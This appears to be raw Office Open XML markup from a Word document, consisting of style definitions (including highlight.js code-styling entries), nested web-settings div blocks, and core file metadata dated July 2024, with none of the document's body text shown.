    <w:rsid w:val="009B74BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="009B74BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="009B74BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-meta">
    <w:name w:val="hljs-meta"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="009B74BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="009B74BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-type">
    <w:name w:val="hljs-type"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="009B74BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="009B74BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-variable">
    <w:name w:val="hljs-variable"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="009B74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9B74BB"/>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9B74BB"/>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B74BB"/>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9B74BB"/>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9B74B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9B74BB"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Textoennegrita">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="009B74BB"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLconformatoprevio">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLconformatoprevioCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009B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9B74BB"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="es-CL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="009B74BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="009B74BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="009B74BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-meta">
    <w:name w:val="hljs-meta"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="009B74BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="009B74BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-type">
    <w:name w:val="hljs-type"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="009B74BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="009B74BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-variable">
    <w:name w:val="hljs-variable"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="009B7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057718">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1078789654">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="811796305">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1619600554">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="1125734424">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1738160647">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="800726064">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1965692470">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="2132287930">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1556620197">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1981038276">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="952438821">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="260913125">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2142728492">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="512426930">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2002076487">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="1103187863">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="434449229">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="286472413">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1381132546">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="12417260">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="244850879">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1610352781">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1057318401">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="327514528">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1527790707">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="131411090">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1238049471">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="1727491265">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="965627209">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="83577725">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="483007176">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="1135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541</Words>
  <Characters>2976</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>24</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Luffi</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2024-07-15T05:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-15T05:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>